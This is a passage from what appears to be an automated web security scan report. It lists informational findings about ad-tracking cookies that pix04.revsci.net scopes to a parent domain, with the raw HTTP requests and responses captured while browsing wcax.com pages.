Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; rsi_us_1000000=pUP1Jk+jPwIQlm3EfKIIeTUeF/JvyQbq8mWZPtA01FS2ee8dNFxF4G+GnAMn9WcrwrlxaFqY0O/f2fJMysjjHKnHR1AyLyrV5YaNDkJ/Sz9iTSLWnrcqaeW9JQdk5xB8c5TT7BS5boeRjEXk88graUNSSoQBET1n8cYfeqxRms6DsyWntJXFg4q6t8nlTBXRhlT3ZnaU2QqHtEwjbkGX2cuE5sFvvxfDc0P1x1/YkINpgXca0zgdRWoC3FkTquy/LDHspJLb+6ye52i0gFZ8jaiDtEDQhwQMsqBgw+jJJuD5Y2BkMUQ3RbgfQY9C5tK/FmqYRFZ52k9CfvQzFcVI5PWBlmX8RPSEQN1nnPjNs01GIqNMz9awgCd4dP+vDcMlLAiX5AAQodEidAYP+DcEiCL0bX2IgR07U3iUVDf66rT8NwEy8uPRt4Q7j86Eak+GQEpZDNk7iHnphbuIOYn854kFrhr9LHPGiRTBN9SDG02GRydnp8QEtYyWpdxNzpAz9+BJpIyWBHWSXJU/lT8YMZc0rZpJ/9pq+rino+75Z7tI/xKhizjb7SgX/Zn1a38AtieO7F8k1YX9JM6IqYnbfNnzinjIJ/gcLiFPu6S+z7Sa5mI3O/WshNmzmWQg0GiPE4fCQCsyTxRgJ0dq2w==; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; udm_0=MLv39SEJaSpn5l6paFGF4PE3PRxA2jF7YYC1PcJb22pwwouGCTcavWRp5gDOVMIHzRWjEwivKG4y8bEh5C5wLlcCwDPbMqRj2DXkTGhDQ89mbFozYsJjVTEuEe/h536ulQSV9ZLPlq3zvY5wI7GSTD5BVaK5PSi5iO04v1pj7PDeGv3V9gM7ANffp4aB2AM/h4hv+T5HgJbAtgb7HqevDR626jrhmXkk69RBMAXp1DdSPYAPQJHJvn/rzZsMfoFkbubkYHmjVEVLasemhsTEo1Serlxmbl0IVn7AefJE4seiDicdI2wontu9IZLwVXc02bCqrYwtitQsQNji6bUMTo/0rT2RSfwdDGJa7xU+fFcroN7218oqxT9x7L35X5DfVBaDrfv29icbjnSxpOmzgnRCNJmalrXQiknC6CGG5dH7zlYBBxkva9nw22SQmXdD/88SrbpYrpKf+UKKtKwts/IjOB6Eazt2PobI4tp2kA5KVtcoWhxRPIHmFCOBaTtO1X2GbaZEI8S14df58UYAZy0ZN5YWWI+O3XTTnts/cczEz7N38q1uFXosRoM5IgYSR04JtFLNDfl6qTI/rRuBVZdxRsDurKPAe1hfxGdmi43q8kUTMdL/6iojPW8Bpg1leE5rV9I+r1+ddGv5HLF1pTh3a+c58Cju7a0VXEHncV9/jXQM/WWwB3k1nJ2JDj9LnMNfD3topntubRGUl2IHm/cuf4Pmw6IoBenU93ZANgR8RJmAS9jO3pq6W15G8DajMvT2Me5/680mvSKsbn8Ovx2R1L4UTH6Km0BSQD2a0DdQOlZLvCu6QyaEfjRkLzHqiwqSJq4cGLPTom4fK3zWi7uWVgSjuYevdiogpfoKxnEMYxVDqJSS06gQ3rnQQxFCYVdSRj2Y9kY+SYa7XCqnZrKPGeBwqT0TlcOMQ0TSbcFBKbc3OQaYo4/OTIjOJKFQ9uSW7SYRUSMKG538HQcbyYKwIxW6hAYLW9Q1y9MJ/g328nZvUZ7bZMGBwpxqeVab0uTo3M5eA37y1R62xsVIrL3T8Y3jsAk6da8WuMg8qhQM77GcgsxMV8+8QbHPrn7mYnL5YvFO6V+LFGqyfa3btS08ujZPpHweBvJ8FjgxIVDr32Hjid6G; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc53c39&0&&4d9ebfcb&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc53c3d&0&&4d9fd0ee&00f8712b16a2747053422af6cef97d9a; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; rsi_segs_1000000=pUPF50OBL3IQT7uItGE2XZ+B7gFWE6TaYgYB7RmojcJSum2NZ/Do4j9p9LQR/PMkrTXt7zuDC1rEEqU0EZdFENKKsJ+cP1DW5sfX9JRD2sOsMwrvKRruw2D0aUM8HqYeBaSkzgIPkJtKTgDSBYiT8mIKnckuID1we0jFlLnRA9be3pGTRoPQDOuDisXq8kDcQnkQckIN+yh/2OGL+8YVUWs7iJsuME+D1mHxR9zY5V8QrjW5fpkDdPiKZ7t7JMDZC5V0Is9yrhpyHVj9gkK0fqe6GXsu+W/pZ3mf9JXBkEAqAWtol27/FBxFGAF5C0w=; rtc_NqMU=MLsv7iUucA5nprADoxMUZ9S30MEszwLosfaz5fWZ65hV2fUOBnLo+BWjQ4EZHeotOXo28EHvDL1pbOBARLmM/MYd6RgTq9u+iM7/hQBOpPrdSk21eU9Lpyn2txgsRP0c/xxljHTX7BOLqY4BgQCs3lhGEmvvtSk5ED4MMDjv8yVDLYK7pDAruXeuMbqWcYC2y8NbEmpQplW1r3QCDBMDKlKs8h8jhookQYAMg5VB8aLCKuUNtwB34ZoQt95cCo91UbMwGaFSr6asrq672fdH+xzIkZMRNy3EgFEOFuAASeQu0Vmfb3m3aVzU53rLUI0DvmE+6V5MRfJFqiXP3mwBN1JQOHtAvauFYtPfu791mq8kh/67bj1dtkYfONjJz46HXLiLXT9vUqTOR8dIMLhwh5QgSMzCmH/uFvWfD3l3pX8QaFC1vCAqFk8T34QxWHhhMKOHgnb4Ef8/sjmrJ7cwLNcYjHKHaF1zK4a+nl+D77j2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_NqMU=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0OBbwIMV58ceRtDq2qIWKwAWMjKCDeVRxV0pHs7MiO0UzrToS2ouz039v0EpRxSyNYjSDa1pMRxZm3WVajTlS++7eQSt8yWAsT4ruDEtDIgwnlax8clE90i4ZyJB7xtKSp/S7ZTUe74Q4eRuqh+fxVKV20za50CA1lADf2azroO0f1gGfeteIkb6zsAIeihQRxK/nexzALoxJRiiGYFrCmrA4TzLrU2qZBMsuixEnVIP+5Vw9zfmsNGyedq/kgi0AUeyzWOzWwmpHYzknGbX0FfHJPLDj3Dwxwv86xYW5QDnUddcVNKPwwQlMyCaE0=; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 13:16:02 GMT; Path=/
Set-Cookie: rtc_H5uf=MLsv8SUucA5nprADwxMUZdS30MEszwLosfaz5fWZ65hV2fUOBnLo+BWjQ4EZLeotOXo28EHvDL1pbNNARLmM/MYdyRgTqxD/lMxcrQFepPrNSkm1eU9Lpin2xzgwRP18/xxpkNoVxqc5g0K0i0fqu3Z4OZ9TCWukp+fzOXqRG+FbCpZ1lNWeSoRp4pvl4W6xqmQFwWU4O5lr/3fAwOzCWOZFcV4p1IbmF2CVroSv3ekRCrxTkn5Gj5BfK6lws/9BSK4R70kIxYgnwBeKw5gxrJ3HWM6FdzLDP5HzR2IBwJkmQi2PJ2/xBDCzSRK2+IWaGVbp6A4vS07+Pp50Hceyamh9kzCVl5fXWYJfEHo3UDxtErrqNDBNGococWXvmK9Mn9/Q6WuUqV6V5eL076M1x6tZ+Kt2nJxiCiipnhEvR401rHK3bALb6xPrlKqYCmmWIf+v0EeQWP5MoKcUvGL45sV23Lj6SqCX5B1KhaG/GlEdpdM=; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 13:16:02 GMT; Path=/
X-Proc-ms: 27
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 13:16:01 GMT
Content-Length: 653

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs = ['E05511_10410','E05511_10412','E05511_10033','E05511_10034','E05511_10004','D08734_70006','D08734_70043','D08734_70072','E05511_10424'
...[SNIP]...
5.112. http://pix04.revsci.net/E05511/b3/0/3/0902121/695595891.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05511/b3/0/3/0902121/695595891.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05511/b3/0/3/0902121/695595891.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%2526affname%253DWCAX%2526adtag%253DCommunity%2526conttype%253DC%2526baseurl%253Dwww.wcax.com%26DM_EOM%3D1&C=E05511 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18836
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc2dfb1&0&&4d9d35c9&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc2dfbd&0&&4d9d2f40&00f8712b16a2747053422af6cef97d9a; rsi_us_1000000=pUP1Jk+jPwIQlm3EfKIIeTUeF/JvyQbq8mWZPtA01FS2ee8dNFxF4G+GnAMn9WcrwrlxaFqY0O/f2fJMysjjHKnHR1AyLyrV5YaNDkJ/Sz9iTSLWnrcqaeW9JQdk5xB8c5TT7BS5boeRjEXk88graUNSSoQBET1n8cYfeqxRms6DsyWntJXFg4q6t8nlTBXRhlT3ZnaU2QqHtEwjbkGX2cuE5sFvvxfDc0P1x1/YkINpgXca0zgdRWoC3FkTquy/LDHspJLb+6ye52i0gFZ8jaiDtEDQhwQMsqBgw+jJJuD5Y2BkMUQ3RbgfQY9C5tK/FmqYRFZ52k9CfvQzFcVI5PWBlmX8RPSEQN1nnPjNs01GIqNMz9awgCd4dP+vDcMlLAiX5AAQodEidAYP+DcEiCL0bX2IgR07U3iUVDf66rT8NwEy8uPRt4Q7j86Eak+GQEpZDNk7iHnphbuIOYn854kFrhr9LHPGiRTBN9SDG02GRydnp8QEtYyWpdxNzpAz9+BJpIyWBHWSXJU/lT8YMZc0rZpJ/9pq+rino+75Z7tI/xKhizjb7SgX/Zn1a38AtieO7F8k1YX9JM6IqYnbfNnzinjIJ/gcLiFPu6S+z7Sa5mI3O/WshNmzmWQg0GiPE4fCQCsyTxRgJ0dq2w==; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; udm_0=MLv39SEJaSpn5l6paFGF4PE3PRxA2jF7YYC1PcJb22pwwouGCTcavWRp5gDOVMIHzRWjEwivKG4y8bEh5C5wLlcCwDPbMqRj2DXkTGhDQ89mbFozYsJjVTEuEe/h536ulQSV9ZLPlq3zvY5wI7GSTD5BVaK5PSi5iO04v1pj7PDeGv3V9gM7ANffp4aB2AM/h4hv+T5HgJbAtgb7HqevDR626jrhmXkk69RBMAXp1DdSPYAPQJHJvn/rzZsMfoFkbubkYHmjVEVLasemhsTEo1Serlxmbl0IVn7AefJE4seiDicdI2wontu9IZLwVXc02bCqrYwtitQsQNji6bUMTo/0rT2RSfwdDGJa7xU+fFcroN7218oqxT9x7L35X5DfVBaDrfv29icbjnSxpOmzgnRCNJmalrXQiknC6CGG5dH7zlYBBxkva9nw22SQmXdD/88SrbpYrpKf+UKKtKwts/IjOB6Eazt2PobI4tp2kA5KVtcoWhxRPIHmFCOBaTtO1X2GbaZEI8S14df58UYAZy0ZN5YWWI+O3XTTnts/cczEz7N38q1uFXosRoM5IgYSR04JtFLNDfl6qTI/rRuBVZdxRsDurKPAe1hfxGdmi43q8kUTMdL/6iojPW8Bpg1leE5rV9I+r1+ddGv5HLF1pTh3a+c58Cju7a0VXEHncV9/jXQM/WWwB3k1nJ2JDj9LnMNfD3topntubRGUl2IHm/cuf4Pmw6IoBenU93ZANgR8RJmAS9jO3pq6W15G8DajMvT2Me5/680mvSKsbn8Ovx2R1L4UTH6Km0BSQD2a0DdQOlZLvCu6QyaEfjRkLzHqiwqSJq4cGLPTom4fK3zWi7uWVgSjuYevdiogpfoKxnEMYxVDqJSS06gQ3rnQQxFCYVdSRj2Y9kY+SYa7XCqnZrKPGeBwqT0TlcOMQ0TSbcFBKbc3OQaYo4/OTIjOJKFQ9uSW7SYRUSMKG538HQcbyYKwIxW6hAYLW9Q1y9MJ/g328nZvUZ7bZMGBwpxqeVab0uTo3M5eA37y1R62xsVIrL3T8Y3jsAk6da8WuMg8qhQM77GcgsxMV8+8QbHPrn7mYnL5YvFO6V+LFGqyfa3btS08ujZPpHweBvJ8FjgxIVDr32Hjid6G; rsi_segs_1000000=pUPFOEOBLwIMVp8ceRM3WRl5l/8VdUUz9mYkDWlJfp5AoQ4NFluEUw2hr80cgj7G6Lq6eb2pifkgIl3hQFaWH4wAGfONd0AxNl9R4r24yg2IkXClwXqAex+KgbymzZmFm7jteB85NWCbzH30/LfD/5dGBfMl/lQilsQgCYbOhR/TOqs1CzTmsIjI85HYclwwLOuQEfKTLuS03/PsSzK2NZvgGTGBipaU0me8Y2ECBHtO6EXAgsL4DqCjgpN2N81wsxrp5ROQWKOWK5txk+NIHnk=; rtc_A1DH=MLsv7tUvsW9npigQh+m6PS9pIDm9YCrv+PJNecGjhxSUI1bCZ8Ri9PlaJ0eYwhF0dD57GtlzTWSLIXg3Y98VhJqU2IQZmMvmGuG9Jx5GJCMAKT9/9DCsOSrrzmmNaIkcQa83G6V7noY9MwAXfdgQgHVd/8ZT6oL5hwebdaMLK/91t2b/aRBabBZSk3tfHbOX1PK+XO36gnb2K3GZDddDK0R7j3WozV2g0OuzMO7KRVs5DYCIxULFxn28fZG0HT8WlUPkgbCcFK+aNbesM2ofG2rjFFYrX15lLAWfw+XPAPKPbZ3vEr5hBiSTVq2UpdmEVM0jExfX+kj25CPQeNDSfQt7H06cIGryO9V8q9VcDuXXy3+aY5RHWklTcyvTVQz9kggexx1fvkeTIHKTZhc4z7U=; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc53c39&0&&4d9ebfcb&00f8712b16a2747053422af6cef97d9a

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_A1DH=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFOEOFrwIUl63R0Pblm12emcUQW0uQVITAEXBTSyBcnze5Uw5zMF+oiR038qk3yDoup/8jHveuED0BkkfjgI/s+6FOZTFaCP8ymrzcvkjLdnBnw+D8fOutzdt7YCgZNo/SwenFUb53VA5AT1SyI+t59FBa/YaeYfbe0oUXLfLhw0E+RZjw5yl9y/QdhhUVf05O9AfU2w2WWwbhhIBDW3jAt5Jf2rSQWR6vzaOlKHLsdr6msjPXvCMGVTLcKDJsyqXlqYl472HA5KGaJ0FclfgsGbZGyJBd; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:34:05 GMT; Path=/
Set-Cookie: rtc_SOnt=MLsvr1UucS5jJxFcgo4AHK1+XkG5rAlP/Aq7SD8BxfGVHQohJ6FrqzzS13LtwLGPNU614wt1b+MA5RJdLaRrQUnmpA7Dn8HsEBQ22XijZ0avgB0uN3VFJc64A0JJWRHRyM1PJ99bh6wdpsfpwx4TBTmD3T+5LQCgxpcHmMgHZ8wIf5AXPQBlECGUWObVTp2Wl2qTjza4WAnSDu2o+g30biDqE3K7+WYa4uP79fIQxTnzUkcD2C2lBhcwN6MpTkcpeY7mSvqGCBrNPjyYsVMWxl5QK8tfyjKMF+FnU4w5VEBlKqw9THqvw7/hMLzC7Yn7urpFhINBgaNR6S81tE7rvXjW74KR31Dequ7esAsSMNxolukA9NP8blDzaV5mTOn/iSbi2cjC8JofbZ+Fcqks+HS7qUoBl5mk9dKKa7qhzXQ=; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:34:05 GMT; Path=/
Set-Cookie: NETSEGS_L09857=379226250c6302c7&L09857&0&4dc53c3d&0&&4d9fd0ee&00f8712b16a2747053422af6cef97d9a; Domain=.revsci.net; Expires=Sat, 07-May-2011 12:34:05 GMT; Path=/
X-Proc-ms: 23
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 12:34:04 GMT
Content-Length: 413

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs = ['E05511_10410','E05511_10412','E05511_10033','E05511_10004','D08734_70006','D08734_72076','D08734_72077','D08734_72082','E05511_50085'
...[SNIP]...
5.113. http://pix04.revsci.net/E05511/b3/0/3/0902121/699418016.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05511/b3/0/3/0902121/699418016.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05511/b3/0/3/0902121/699418016.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fstory.asp%253FS%253D465801%2526affname%253DWCAX%2526adtag%253DNews%2526conttype%253DS%2526baseurl%253Dwww.wcax.com%26DM_REF%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26DM_EOM%3D1&C=E05511 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=465801
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; rsi_us_1000000=pUP1Jk+jPwIQlm3EfKIIeTUeF/JvyQbq8mWZPtA01FS2ee8dNFxF4G+GnAMn9WcrwrlxaFqY0O/f2fJMysjjHKnHR1AyLyrV5YaNDkJ/Sz9iTSLWnrcqaeW9JQdk5xB8c5TT7BS5boeRjEXk88graUNSSoQBET1n8cYfeqxRms6DsyWntJXFg4q6t8nlTBXRhlT3ZnaU2QqHtEwjbkGX2cuE5sFvvxfDc0P1x1/YkINpgXca0zgdRWoC3FkTquy/LDHspJLb+6ye52i0gFZ8jaiDtEDQhwQMsqBgw+jJJuD5Y2BkMUQ3RbgfQY9C5tK/FmqYRFZ52k9CfvQzFcVI5PWBlmX8RPSEQN1nnPjNs01GIqNMz9awgCd4dP+vDcMlLAiX5AAQodEidAYP+DcEiCL0bX2IgR07U3iUVDf66rT8NwEy8uPRt4Q7j86Eak+GQEpZDNk7iHnphbuIOYn854kFrhr9LHPGiRTBN9SDG02GRydnp8QEtYyWpdxNzpAz9+BJpIyWBHWSXJU/lT8YMZc0rZpJ/9pq+rino+75Z7tI/xKhizjb7SgX/Zn1a38AtieO7F8k1YX9JM6IqYnbfNnzinjIJ/gcLiFPu6S+z7Sa5mI3O/WshNmzmWQg0GiPE4fCQCsyTxRgJ0dq2w==; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; udm_0=MLv39SEJaSpn5l6paFGF4PE3PRxA2jF7YYC1PcJb22pwwouGCTcavWRp5gDOVMIHzRWjEwivKG4y8bEh5C5wLlcCwDPbMqRj2DXkTGhDQ89mbFozYsJjVTEuEe/h536ulQSV9ZLPlq3zvY5wI7GSTD5BVaK5PSi5iO04v1pj7PDeGv3V9gM7ANffp4aB2AM/h4hv+T5HgJbAtgb7HqevDR626jrhmXkk69RBMAXp1DdSPYAPQJHJvn/rzZsMfoFkbubkYHmjVEVLasemhsTEo1Serlxmbl0IVn7AefJE4seiDicdI2wontu9IZLwVXc02bCqrYwtitQsQNji6bUMTo/0rT2RSfwdDGJa7xU+fFcroN7218oqxT9x7L35X5DfVBaDrfv29icbjnSxpOmzgnRCNJmalrXQiknC6CGG5dH7zlYBBxkva9nw22SQmXdD/88SrbpYrpKf+UKKtKwts/IjOB6Eazt2PobI4tp2kA5KVtcoWhxRPIHmFCOBaTtO1X2GbaZEI8S14df58UYAZy0ZN5YWWI+O3XTTnts/cczEz7N38q1uFXosRoM5IgYSR04JtFLNDfl6qTI/rRuBVZdxRsDurKPAe1hfxGdmi43q8kUTMdL/6iojPW8Bpg1leE5rV9I+r1+ddGv5HLF1pTh3a+c58Cju7a0VXEHncV9/jXQM/WWwB3k1nJ2JDj9LnMNfD3topntubRGUl2IHm/cuf4Pmw6IoBenU93ZANgR8RJmAS9jO3pq6W15G8DajMvT2Me5/680mvSKsbn8Ovx2R1L4UTH6Km0BSQD2a0DdQOlZLvCu6QyaEfjRkLzHqiwqSJq4cGLPTom4fK3zWi7uWVgSjuYevdiogpfoKxnEMYxVDqJSS06gQ3rnQQxFCYVdSRj2Y9kY+SYa7XCqnZrKPGeBwqT0TlcOMQ0TSbcFBKbc3OQaYo4/OTIjOJKFQ9uSW7SYRUSMKG538HQcbyYKwIxW6hAYLW9Q1y9MJ/g328nZvUZ7bZMGBwpxqeVab0uTo3M5eA37y1R62xsVIrL3T8Y3jsAk6da8WuMg8qhQM77GcgsxMV8+8QbHPrn7mYnL5YvFO6V+LFGqyfa3btS08ujZPpHweBvJ8FjgxIVDr32Hjid6G; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc53c39&0&&4d9ebfcb&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc53c3d&0&&4d9fd0ee&00f8712b16a2747053422af6cef97d9a; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; rsi_segs_1000000=pUPFJ0OBbwIMV594t6370FESU50e19nKCDeVRxV0pPvV/yUINBxjwRSIooUUZKyvzimW1udzH0uw6mWx+zWRJ7JnGfOpf0Ud/9xHuDtILCncfzqXUamLmmKDVc2I07MSrhYndj0mALnNBwrT+E9TvrxIKkcXN22L9aL0nb73wT+opCYT6f0AA8qclZDQfKpaVbx01CfUHl715ZLhdoPmzvwD1+aYUgzsUGyMrSP14ZmVjwcT+5TxbifLChKdJao6WHWpWV4ShZanM/hfPFH/lF0HVty1iwPB3d5TFqLHW/6YY7Ok/Z2JKoKHEl7SFnRArw==; rtc_ZDRt=MLsv7iUucA5nprADwxMU7dS30MEszwLosfaz5fWZ65hV2fUOBnLo+BWjQ4EZHeotOXo28EHvDL1pbOBARLmM/MYd6RgTq9u+iM7/hQBepPrdSk21eU9Lpyn2tzgwRP0c/xxljHTX7BOLqY4BgQC03lRGEmvvtSk5ED4IMDjv8yVDLIK7pDAruXGuNrqWcYC2y8NTEmqwp1W1r3QCTBMPKlKt8h8jhogkQYAEg5VB8arCKp0tKwd34RoQt9pfCo91MbMw2aFSr6asrqy72fdH+/zLkZMRMy3ciFEOFuAAUeQuwVGfb3k3GVzU53rLUI0DvmM+6V5MRX1CqiXP3mwBN1MQ8mPvGr+qM8YE4h9IgMnmrTH8vdwVzzmKxdAFML67Dft3ETWNo373nILFCOSd1vgwNYXcTuHTqYEl4k5deAJ/QaLuaTNFARLE0GJGZm144sbAffZWpSi/OK979TxuQBnYIYB1WHNnx7GJBucarx4=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_ZDRt=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0OBLwIMVp8ceRNDq2qI6PksTn9J0QSlgYlQhPrU/yUINJwrcQgYrocUZKyvzimW9stkryykBGWx+zsRJJJHGffRX0UbHd1GuLNHKym8P0LbSVFlz/vsh0oin7o3Bbz1tXhw1TpqAvMZ1v1Lv8NerqkTC1dntz9NMPA0y2boUy5YvzZcSjm3tpd47YdWtojAsSJVdmaywtLPjnkqOd7O5PXvEu8+NH0vSpTTZYXkTkF3x2lf/+QSn1zllHsIyVTCkvfhkvAtzGJQB4xg6bp5oT7zuhgB5r6Y62eaYMOVdwEQy5yJLWr53Cfi9mFAog==; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:59:45 GMT; Path=/
Set-Cookie: rtc_-Odm=MLsv8SUucA5nprADo8Nq7dG30MEszwLosfaz5fWZ65hV2fUOBnLo+BWjQ4EZLeotOXo28EHvDL1pbNNARLmM/MYdyRgTqxD/lMxcrQFOpPrNSkm1eU9Lpin2x9jJdbuKtNkElLVE051AluTuDnRDieHkyvaZNMAKnMOnxWWEt8Bj2ZwKECyW0ZU/wYMurf3oH/xJXerILxH/z3W8t0as+z/3fJ8azYrm12OFroSv3dkRCrzSdbJ66D0Dt9pfio56UesBj+1SLyZM8fJnR4MNTI0wzO41bbP1Wws8UaQ/4AuRitULgKokR7aSBTL/fY/adIXHS4s1pNFsz2sFWsx5QC99bfHaXZ4zQpVwoJJzZTD9kvrdMDCgOltk2DQT2lKk0FDcxaMKw7/KxVDLSlk+RBRhjcN1Xj/tWNoaFV9sbtoigkBD83eZUXFOzMKJ6uEXoIZDzkIGr0PoLrM+t2W7ciP0X6oF/RXzuO7qRtCJao66pQ0=; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:59:45 GMT; Path=/
X-Proc-ms: 30
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 12:59:44 GMT
Content-Length: 653

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs = ['E05511_10410','E05511_10412','E05511_10033','E05511_10034','E05511_10004','D08734_70006','D08734_70043','D08734_70072','E05511_10424'
...[SNIP]...
5.114. http://pix04.revsci.net/E05511/b3/0/3/0902121/700224037.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05511/b3/0/3/0902121/700224037.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05511/b3/0/3/0902121/700224037.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.wcax.com%252Fglobal%252Flink.asp%253FL%253D104054%2526function%253Dmanageprofile%2526mode%253Dlogin%2526referrer%253Dhttp%25253A%252F%252Fwww.wcax.com%252Fglobal%252Flink.asp%25253FL%25253D104054%252526function%25253Dmanageprofile%252526mode%25253Dcreate%252526referrer%25253Dhttp%2525253A%252F%252Fwww.wcax.com%252FGlobal%252Flink.asp%2525253FL%2525253D398823%2526affname%253DWCAX%2526adtag%253DRegistration%2526conttype%253DL%2526baseurl%253Dwww.wcax.com%26DM_REF%3Dhttp%253A%252F%252Fwww.wcax.com%252Fglobal%252Flink.asp%253FL%253D104054%2526function%253Dmanageprofile%2526mode%253Dcreate%2526referrer%253Dhttp%25253A%252F%252Fwww.wcax.com%252FGlobal%252Flink.asp%25253FL%25253D398823%26DM_EOM%3D1&C=E05511 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/global/link.asp?L=104054&function=manageprofile&mode=login&referrer=http%3A//www.wcax.com/global/link.asp%3FL%3D104054%26function%3Dmanageprofile%26mode%3Dcreate%26referrer%3Dhttp%253A//www.wcax.com/Global/link.asp%253FL%253D398823
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
